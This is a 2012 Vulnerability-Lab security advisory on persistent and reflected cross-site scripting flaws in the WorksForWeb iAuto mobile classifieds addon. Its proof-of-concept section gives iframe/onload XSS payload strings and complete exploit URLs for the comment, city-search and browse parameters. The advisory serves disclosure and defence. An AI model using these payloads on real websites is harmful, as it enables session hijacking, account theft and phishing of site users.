199 lines
No EOL
8.2 KiB
Text
Executable file
199 lines
No EOL
8.2 KiB
Text
Executable file
Title:
|
||
======
|
||
iAuto Mobile Application 2012 - Multiple Web Vulnerabilities
|
||
|
||
|
||
Date:
|
||
=====
|
||
2012-07-11
|
||
|
||
|
||
References:
|
||
===========
|
||
http://www.vulnerability-lab.com/get_content.php?id=658
|
||
|
||
|
||
VL-ID:
|
||
=====
|
||
658
|
||
|
||
|
||
Common Vulnerability Scoring System:
|
||
====================================
|
||
3.5
|
||
|
||
|
||
Introduction:
|
||
=============
|
||
With Internet on mobile devices booming, having a desktop-oriented version is just not enough anymore. Empower your
|
||
visitors with content designed for mobile Web by offering them a mobile version of your classifieds website.
|
||
WorksForWeb is offering custom-made mobile frontend addons for our classified solutions. The mobile version of your
|
||
website will present all the data of the regular website in the format optimized for iPhone, Android, iPad, BlackBerry,
|
||
Symbian, or other mobile devices. Mobile frontend addon features:
|
||
|
||
Quick and advanced search,
|
||
Browsing,
|
||
Tabbed design,
|
||
Multi-language interface,
|
||
Google Maps,
|
||
And much more
|
||
|
||
Addon is seamlessly integrated with your main website. Your website automatically detects mobile browsers to redirect
|
||
mobile visitors to the mobile-optimized content. Why do you need a mobile gateway to your website? Because all the market
|
||
leaders have mobile access, and so should you. The mobile technology is redefining our future, and you should be one step
|
||
ahead of your smaller competitors. Mobile users now make up a large percentage of your target audience, and their needs
|
||
to access information easily are important to address. At this moment, the mobile addon is compatible with classified
|
||
solutions of v.5.2 and above. The price of the mobile frontend addon is only $175. This price includes a free expert
|
||
installation on your server.
|
||
|
||
(Copy of the Vendor Homepage: http://www.worksforweb.com/classifieds-software/addons/mobile-addon/ )
|
||
|
||
|
||
Abstract:
|
||
=========
|
||
The Vulnerability Laboratory Research Team discovered multiple cross site vulnerabilities in the iAuto Mobile APP for Android, iOS & Blackberry.
|
||
|
||
|
||
Report-Timeline:
|
||
================
|
||
2012-07-10: Public or Non-Public Disclosure
|
||
|
||
|
||
Status:
|
||
========
|
||
Published
|
||
|
||
|
||
Exploitation-Technique:
|
||
=======================
|
||
Remote
|
||
|
||
|
||
Severity:
|
||
=========
|
||
Medium
|
||
|
||
|
||
Details:
|
||
========
|
||
1.1
|
||
A persistent input validation vulnerability is detected in the iAuto Mobile APP for Android, iOS (iPhone), Ericsson & Blackberry.
|
||
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability
|
||
is located in comments module with the bound vulnerable commentSid parameter. Successful exploitation of the vulnerability can lead to session
|
||
hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action & privileged user account.
|
||
|
||
Vulnerable Module(s):
|
||
[+] Comments > Reply to The Comment Listing
|
||
|
||
Vulnerable Parameter(s):
|
||
[+] commentSid & commentInfo
|
||
|
||
|
||
1.2
|
||
Multiple non persistent cross site scripting vulnerabilities are detected in the iAuto Mobile APP for Android, iOS (iPhone), Ericsson & Blackberry.
|
||
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action or
|
||
local low privileged user account. The bugs are located in the Dealer > Search Sellers or Browse by Make and Model with the bound vulnerable
|
||
parameters city & path/url. Successful exploitation can result in account steal, client side phishing & client-side content request manipulation.
|
||
Exploitation requires medium or high user inter action & without privileged web application user account.
|
||
|
||
|
||
Vulnerable Module(s):
|
||
[+] Dealer > Search Sellers > City
|
||
[+] Browse by Make and Model > /../ >
|
||
|
||
Vulnerable Parameter(s):
|
||
[+] City
|
||
[+] Folder Access Listing
|
||
|
||
|
||
Proof of Concept:
|
||
=================
|
||
1.1
|
||
The persistent vulnerabilities can be exploited by remote attackers with low privileged user account and with low required user inter action.
|
||
For demonstration or reproduce ...
|
||
|
||
|
||
Review: Add Comments - Listing
|
||
|
||
<div class="addComment">
|
||
<h1>Reply to The Comment</h1>
|
||
<div class="pageDescription">
|
||
<div class="commentInfo">You are replying to the comment
|
||
#"><iframe src="iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT INJECTED CODE!])' <="" to=""
|
||
listing="" #448="" "<span="" class="fieldValue fieldValueYear" height="900" width="1000">2007</span>
|
||
<span class="fieldValue fieldValueMake">Acura</span>
|
||
|
||
|
||
|
||
1.2
|
||
The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or highr equired user inter action.
|
||
Fo demonstration or reproduce ...
|
||
|
||
String: "><iframe src=http://vuln-lab.com width=1000 height=900 onload=alert("VulnerabilityLab") <
|
||
|
||
Dealer > Search Sellers > City
|
||
|
||
PoC:
|
||
http://iauto.xxx.com/iAuto/m/users/search/?DealershipName[equal]=jamaikan-hope23&City[equal]=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+
|
||
width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search
|
||
|
||
|
||
Browse by Make and Model / AC Cobra / >
|
||
|
||
PoC:
|
||
http://iauto.xxx.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20
|
||
width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/
|
||
|
||
|
||
Comments > Reply to The Comment > Topic & Text (commentSid)
|
||
|
||
PoC:
|
||
http://iauto.xxx.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000
|
||
%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F
|
||
|
||
|
||
|
||
Risk:
|
||
=====
|
||
1.1
|
||
The security risk of the persistent input validation vulnerability is estimated as medium(+).
|
||
|
||
1.2
|
||
The security risk of the non-persistent cross site scripting vulnerabilities are estimated as low(+)|(-)medium.
|
||
|
||
|
||
Credits:
|
||
========
|
||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
|
||
|
||
|
||
Disclaimer:
|
||
===========
|
||
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
|
||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
||
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
||
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
||
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
||
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
||
or trade with fraud/stolen material.
|
||
|
||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
|
||
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
|
||
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
|
||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||
|
||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
|
||
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
||
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
|
||
|
||
Copyright <20> 2012 | Vulnerability Laboratory
|
||
|
||
|
||
|
||
--
|
||
VULNERABILITY RESEARCH LABORATORY
|
||
LABORATORY RESEARCH TEAM
|
||
CONTACT: research@vulnerability-lab.com |